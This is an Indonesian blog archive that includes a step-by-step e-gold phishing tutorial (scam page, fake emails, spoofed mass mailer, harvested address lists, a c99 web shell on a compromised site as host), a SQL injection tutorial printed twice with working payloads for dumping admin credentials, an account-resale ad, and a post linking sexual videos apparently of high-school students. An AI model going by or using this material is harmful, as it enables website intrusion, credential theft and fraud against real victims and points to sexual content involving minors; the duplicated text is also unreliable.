Jual Account Premium Rapidshare Legal & Aman 100%
ACCOUNT PREMIUM RAPIDSHARE
Legal, Murah, Garansi, No Fraud..
DIJAMIN !!!!
Garansi sepanjang lifetime account hanya untuk anda :
Account 1 bulan :
• Rp. 120.313,- transfer via BCA
Account 3 bulan :
• Rp. 297.313,- transfer via BCA
Account 6 bulan :
• Rp. 526.313,- transfer via BCA
Account 1 Tahun :
• Rp. 964.313,- transfer via BCA
(Di Jamin 100% Tidak Ada Complain, No Garansi) - Dijamin Memuaskan
Account yang saya tawarkan ini account original jadi gak akan pernah ada masalah (beli yang 3 bulan ya 3 bulan lagi baru ganti/perpanjang),hampir dipastikan tidak pernah ada keluhan dan semua customer di jamin puas, hal ini bisa dibuktikan!!!
Buruan, jangan terpancing untuk membeli account yang dijual dengan harga yang sangat rendah (Efek carder atau hack paypal)
Saya jamin bro harga di atas tidak mengecewakan kualitas layanan yang saya berikan. Kasihan kan kalau ada yang beli barang murah tapi kualitasnya tidak memuaskan. Murah tapi baru dipakai beberapa hari langsung fraud. Itu namanya penipuan.....
Cara pemesanan :
YM : gibran354@yahoo.com
Halo : 02313631868
No Rekening : 1340916341
Proses pemesanan account :
1. Anda hubungi saya, saya akan berikan no rekening BCA saya
2. Anda transfer ke rekening BCA saya
3. Account langsung saya kirim ke email anda (Proses kurang lebih 15-20 menit)
Jika pesan dan membeli dari saya, dijamin tidak akan terkena FRAUD detection, karena account yang saya jual asli 100%, langsung dari supplier asli USA, jadi dijamin tidak akan terjadi masalah,Kecuali kalau anda sendiri yang men share ID dan password anda ke teman atau kolega anda.
Sebelumnya terima kasih atas kepercayaan yang anda berikan, dan terima kasih anda.
Tuesday, January 06, 2009
Saturday, November 15, 2008
3gp Anak SMU
lanjut mangggggggg ???
Ndak Jelas sih kata orang mah..? tapi bikin penasaran alias sange maning sudah umum dan menjadi pembahasan publik anak2 indonesia membicarakan sex. lebih baik langsung main ajha.. atau kalo mu liat tutorial nya boleh disini ada koq.. ?
Video 01
video 02
video 03
video 04
Video 05
Video 06
Video 07
Video 08
Video 09
Video 10
Video 11
Video 12
Selamat Menikmati ... ?
Friday, November 14, 2008
SQL Injection Tutorial
In this tutorial i will describe how sql injection works and how to
use it to get some useful information.
First of all: What is SQL injection?
It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).
1.SQL Injection (classic or error based or whatever you call it) :D
2.Blind SQL Injection (the harder part)
So let's start with some action :D
1). Check for vulnerability
Let's say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ' (quote),
and that would be http://www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar
that means is vulrnable to sql injection :)
2). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)
that means that the it has 3 columns, cause we got an error on 4.
3). Check for UNION function
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)
4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
i didn't see any paper covering this problem, so i must write it :)
what we need is convert() function
i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version :D
5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)
we know that table admin exists...
now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up :)
i.e md5 hash, mysql hash, sha1...
now we must complete query to look nice :)
for that we can use concat() function (it joins strings)
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser :D
if can't guess the right table name, you can always try mysql.user (default)
it has user i password columns, so example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
6). MySQL 5
Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is diplayed.
the second one (we change limit 0,1 to limit 1,1)
ie.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc... :D
if you wanna display column names for specific table use this query. (where clause)
let's say that we found table users.
i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
let's say that we found colums user, pass and email.
now to complete query to put them all together :D
for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
That's all in this part, now we can proceed on harder part :)
2. Blind SQL Injection
Blind injection is a little more complicated the classic injection but it can be done :D
I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D
Let's start with advanced stuff.
I will be using our example
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc...
then when we want to test it for blind sql injection attack
http://www.site.com/news.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok.
now the real test
http://www.site.com/news.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don't work then we use subselect
i.e
http://www.site.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend :)
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)
let's say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.
then let's check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is 'i'. We have 'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).
There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,
cause that makes you better SQL INJECTOR :D
Hope you learned something from this paper.
Have FUN! (:
To be continued and updated...
SQL Injection Tutorial by gibran354 (MySQL)
use it to get some useful information.
First of all: What is SQL injection?
It's one of the most common vulnerability in web applications today.
It allows attacker to execute database query in url and gain access
to some confidential information etc...(in shortly).
1.SQL Injection (classic or error based or whatever you call it) :D
2.Blind SQL Injection (the harder part)
So let's start with some action :D
1). Check for vulnerability
Let's say that we have some site like this
http://www.site.com/news.php?id=5
Now to test if is vulrnable we add to the end of url ' (quote),
and that would be http://www.site.com/news.php?id=5'
so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar
that means is vulrnable to sql injection :)
2). Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
so how to use it? Well just incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get message like this Unknown column '4' in 'order clause' or something like that)
that means that the it has 3 columns, cause we got an error on 4.
3). Check for UNION function
With union we can select more data in one sql statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works :)
4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
i didn't see any paper covering this problem, so i must write it :)
what we need is convert() function
i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version :D
5). Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12...) <--- later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good :D)
we know that table admin exists...
now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)
we get username displayed on screen, example would be admin, or superadmin etc...
now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)
we seen password on the screen in hash or plain-text, it depends of how the database is set up :)
i.e md5 hash, mysql hash, sha1...
now we must complete query to look nice :)
for that we can use concat() function (it joins strings)
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser :D
if can't guess the right table name, you can always try mysql.user (default)
it has user i password columns, so example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
6). MySQL 5
Like i said before i'm gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc... :D
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is diplayed.
the second one (we change limit 0,1 to limit 1,1)
ie.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc... :D
if you wanna display column names for specific table use this query. (where clause)
let's say that we found table users.
i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
Note that this won't work if the magic quotes is ON.
let's say that we found colums user, pass and email.
now to complete query to put them all together :D
for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
That's all in this part, now we can proceed on harder part :)
2. Blind SQL Injection
Blind injection is a little more complicated the classic injection but it can be done :D
I must mention, there is very good blind sql injection tutorial by xprog, so it's not bad to read it :D
Let's start with advanced stuff.
I will be using our example
http://www.site.com/news.php?id=5
when we execute this, we see some page and articles on that page, pictures etc...
then when we want to test it for blind sql injection attack
http://www.site.com/news.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok.
now the real test
http://www.site.com/news.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don't work then we use subselect
i.e
http://www.site.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
then we gonna see if we have access to mysql.user
i.e
http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend :)
i.e.
http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users exits.
if you get FALSE (some article missing), just change table name until you guess the right one :)
let's say that we have found that table name is users, now what we need is column name.
the same as table name, we start guessing. Like i said before try the common names for columns.
i.e
http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull characters from that.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.
then let's check the second character.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is 'i'. We have 'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).
There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,
cause that makes you better SQL INJECTOR :D
Hope you learned something from this paper.
Have FUN! (:
To be continued and updated...
SQL Injection Tutorial by gibran354 (MySQL)
Tutorial phising e-gold account
Bila anda bingung dengan judul di atas, mungkin anda lebih familiar dengan kata-kata berikut : "Tutorial mencuri e-gold", "Tutorial hack e-gold". Tapi, saya sendiri kurang suka dengan kata-kata hack e-gold, karena terdengar kurang pantas saja bila menggunakan kata hack. Di tutorial ini, kita akan membuat situs e-gold yang palsu, dan kemudian mengundang para korban untuk login ke situs e-gold palsu milik kita sehingga semua data yang di-input oleh sang korban akan dikirim ke e-mail kita. Tutorial ini diutamakan untuk pemula, yang medium dan advanced -pun boleh membacanya walau hanya untuk sekedar menghabiskan waktu atau sekedar memaki tutorial ini (*atau penulisnya). Tutorial ini hanyalah sebagai pengetahuan semata, segala kerugian yang diakibatkan oleh artikel ini, bukan tanggung jawab penulis.
Hal-hal yang harus dipersiapkan kurang lebih sebagai berikut :
- Web Hosting / Host / PHP Shell / cPanel atau istilah lainnya yang mendukung PHP.
Banyak orang di luar sana yang menggunakan istilah demikian, cpanel, host, php shell atau apalah. Intinya yang kita butuhkan adalah sebuah web hosting dengan dukungan php. Beruntunglah bagi anda yang sering bermain-main dengan php shell, atau mungkin mengutak-atik web sendiri. Karena anda tidak perlu bersusah payah untuk menempatkan situs e-gold anda nantinya atau bila masih kesulitan, setidaknya tahu bagaimana cara mendapatkannya. Namun, jika anda yang masih kesulitan dan belum mengerti bagaimana untuk mendapatkan web hosting sebagai tempat situs e-gold palsu, sepertinya anda harus sedikit bekerja keras untuk mendapatkannya, bisa meminta, berusaha mencari sendiri, atau bagaimanalah. Tapi yang jelas, saya tidak akan memberitahu caranya secara detail di sini, karena sudah banyak situs-situs berbahasa indonesia yang menyediakan cara untuk mendapatkan php shell, cpanel dsb. Atau, anda bisa juga menggunakan CC (Credit Card) untuk memesan web host secara online. Atau cara lain ? Silahkan berfantasi dengan kreativitas anda. Dan jangan lupa, yang terpenting adalah mendukung PHP dan bisa digunakan untuk mengirim e-mail.
Nah, untuk menjebak korban masuk ke dalam lubang jebakan sudah dimulai. Lubang jebakannya sudah disiapkan, lalu ?
- E-gold scampage
Agar korban mau masuk ke dalam lubang jebakan yang kita buat, kita harus membuat lubang jebakan tersebut tidak terlihat seperti lubang jebakan, namun terlihat biasa saja. Kira-kira seperti itulah fungsi scampage ini, dan menurut pendapat pribadi scampage adalah duplikat dari situs asli dan mengedit beberapa bagian sesuai kebutuhan/penipuan atau simple-nya duplikasi situs untuk menipu. Scampage ini merupakan scampage bikinan saya sendiri (*makanya jelek), yang merupakan komposisi dari, situs asli www.e-gold.com, dan menggunakan beberapa campuran script dari scampage yang dibuat oleh phiser lain, namun tidak di-update sehingga tampilannya tidak lagi terlihat seperti situs asli.
Download e-gold scampage di :
http://geocities.com/th3sn0wbr4in/egoldscampage.zip
Setelah anda men-download egoldscampage.zip ke komputer anda, extract file egoldscampage.zip dan edit file login.php dan login1.php yang terletak di folder www.egold.comacct.
Pada bagian $to = "your@e-mail.com"; ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung accountID + password e-gold dari korban-korban anda. Begitu juga pada file login1.php, ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung e-mail + password si korban.
Simpan semua perubahan yang sudah anda lakukan, dan sekarang upload file egoldscampage.zip ke Web Hosting yang sudah anda siapkan sebelumnya dan extract file egoldscampage.zip di Web hosting anda.
- E-mail palsu
Anda memasuki zona terlarang!!! Lewat sini agar anda selamat - TTD, Warga Sekitar. Kira-kira seperti itulah papan yang terpampang ketika anda sedang melewati daerah asing. Orang yang belum mengenal betul daerah tersebut, pasti akan mengikuti petunjuk jalan yang diberikan, apalagi ada tanda bahwa informasi ini berasal dari orang sekitar. Bagi yang panik, tentu mereka tidak lagi berpikir panjang dan langsung mengikuti petunjuk yang ada, sehingga mereka terjebak ke dalam lubang yang kita buat.
Kurang lebih, begitulah fungsi si 'e-mail palsu'. Berikut ini adalah dua buah e-mail palsu yang mungkin bisa anda gunakan.
http://geocities.com/th3sn0wbr4in/gold-letter-1.txt
http://geocities.com/th3sn0wbr4in/gold-letter-2.txt
Untuk gold-letter-1.txt, ada bagian yang harus anda ubah sebelum e-mail tersebut dikirimkan ke korban.
Please update your records on or before October 5th, 2007.
Ganti October 5th, 2007 dengan tanggal 3-5 hari kemudian ketika anda mengirimkan e-mail palsu. Misalnya, anda mengirim e-mail tersebut pada tanggal 1 October 2007, anda ganti menjadi 3-5 hari ke depan sebagai tenggang waktu untuk sang korban.
Pada gold-letter tersebut, ada 4 bagian yaitu : From, Name, Subject, dan Message. Keempat-nya ini akan digunakan pada Inbox Mailer nanti. Jika anda ingin melihat preview e-mail tersebut, copy-paste Message dari letter tersebut ke notepad, dan save sebagai file html. Di setiap e-mail tersebut, terdapat sebuah link yang akan mengarahkan korban ke situs e-gold milik anda.
Contoh pada gold-letter-1.txt, jika anda melihat preview dari e-mail tersebut, isinya adalah demikian :
To update your E-gold records click on the following link:
https://www.e-gold.com/acct/login.html
Namun, bila anda melihat html code-nya, isinya adalah demikian :
To update your E-gold records click on the following link:
https://www.e-gold.com/acct/login.html
Jadi, link https://www.e-gold.com/acct/login.html sebenarnya mengarah ke http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html yang merupakan 'lubang jebakan' milik th3sn0wbr4in. Ganti http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html dengan alamat situs e-gold milik anda sendiri yang sudah anda persiapkan.
Berikut ini, contoh e-mail gold-letter-1 di inbox yahoo milik saya
http://i189.photobucket.com/albums/z55/ianis01/contentmailno4.png
- PHP Inbox Mass Mailer
Sayangnya, kedua gold-letter tersebut barulah desain. Selama e-mail tersebut masih berada di komputer lokal, tidak ada korban yang bisa melihatnya sehingga tidak satupun terjebak masuk ke dalam jebakan yang sudah anda siapkan. Agar 'para korban' melihat e-mail tersebut, anda harus mengirimkan e-mail ke korban.
Dan bila anda ingin korban anda 'melihat' e-mail tersebut, e-mail anda harus tiba di Inbox sang korban, bukan Bulk, Spam, Junk atau istilah lainnya, karena jarang korban yang mau melihat e-mail yang tiba di kategori-kategori tersebut (Bulk, Spam, Junk, etc) walaupun memang ada, tapi tidak banyak.
Karena itu, anda harus menggunakan PHP Inbox Mass Mailer, merupakan sebuah script PHP yang digunakan untuk mengirimkan e-mail secara massal ke korban.
Contoh tampilannya adalah sebagai berikut :
http://i189.photobucket.com/albums/z55/ianis01/mailergl3.png
Isi field Your Email, Your Name, Subject, dan Message seperti yang tertera pada gold-letter-1 atau gold-letter-2, tapi isi dengan gold-letter yang sudah anda edit.
Script php inbox mass mailer :
http://geocities.com/th3sn0wbr4in/mailer.txt
http://geocities.com/th3sn0wbr4in/mailer.arif.txt
Untuk script mailer.arif.txt, didapat dari teman yang original link-nya adalah
http://geocities.com/aliif_1604/run.txt
Agar anda bisa menggunakan PHP Inbox Mass Mailer, anda harus meng-upload-nya ke Web Hosting yang mendukung PHP dan mengirim mail. Sekarang bagaimana caranya agar e-mail tersebut masuk inbox, itu tergantung pada Web Hosting tempat anda meng-upload script mailer-nya. Tidak semua host yang bisa mengirim mail tapi tiba di inbox. Apalagi, kita menggunakan AccountRobot_donotreply@e-gold.com sebagai e-mail pengirim. Bagaimana caranya mengetahui apakah host bisa mengirim e-mail dan tiba di inbox ? Cukup upload script mailer, dan coba anda kirim ke e-mail anda sendiri. Apabila anda mendapatkan e-mail palsu anda tiba di inbox, berarti host tersebut layak digunakan untuk mengirim e-mail e-mail palsu ke korban. Pengalaman pribadi saya sendiri, bagian inilah yang paling sulit. Sejak beberapa tahun yang lalu saya sudah menyiapkan semua yang saya butuhkan untuk membuat jebakan ini, tapi selalu terhenti karena belum juga mendapatkan host yang layak untuk mengirimkan e-mail palsu ke korban. Awalnya saya pikir tidak mungkin mendapatkan host yang bisa mengubah alamat pengirim menjadi seperti AccountRobot_donotreply@e-gold.com. Tapi pada akhir tahun 2006, seorang teman yang memiliki Yahoo! ID tommyhacku memberikan saya sebuah host yang bisa melakukannya.
Jadi, selamat berjuang untuk mendapatkannya. Bila anda sudah mendapatkannya, saat-nya mengumpulkan daftar korban.
- E-mail list
Tentukan siapa korbanmu!!! Bagaimana mengetahui e-mail orang yang memiliki e-gold account?
- Cari dari forum-forum yang berbicara soal e-gold, paypal, atau business
- Cari dari situs-situs HYIP
Tapi sepertinya yang demikian itu cukup sulit. Jadi, kita tidak perlu e-mail yang mana yang mempunyai e-gold account. Masukkan saja semua daftar e-mail ke dalam field target di PHP Mailer. Beberapa cara yang bisa didapatkan untuk mendapatkan e-mail list :
- Beli lewat situs-situs yang menjualnya menggunakan CC. Anda bisa menggunakan keyword "buy e-mail leads" atau keyword lainnya lewat google. Silahkan dicoba-coba keyword lainnya.
- Menggunakan software e-mail extractor
Salah satu software yang terkenal untuk mengumpulkan e-mail adalah Tarantula.
Download software-nya di http://www.emailsmartz.com/downloads/tarantula.exe
Download Patch Tarantula di http://www.geocities.com/toemenggoeng/error/Patch-Tarantula-SG.zip
Jangan tanya saya untuk menggunakannya. Silahkan coba-coba sendiri
- Action!!!
Setelah semua siap, silahkan kirim e-mail palsu ke daftar korban lewat php mailer anda dan tunggu hasilnya di e-mail anda.
Secara simple, yang dibutuhkan adalah :
- Host, yang belum punya boleh nyoba http://modelbc.de/administrator/modules/index_page.php (c99 shell)
- Scampage, source : http://geocities.com/th3sn0wbr4in/egoldscampage.zip
- Mailer + Host utk Mailer, source : http://geocities.com/th3sn0wbr4in/mailer.txt
- Mail list
Hal-hal yang harus dipersiapkan kurang lebih sebagai berikut :
- Web Hosting / Host / PHP Shell / cPanel atau istilah lainnya yang mendukung PHP.
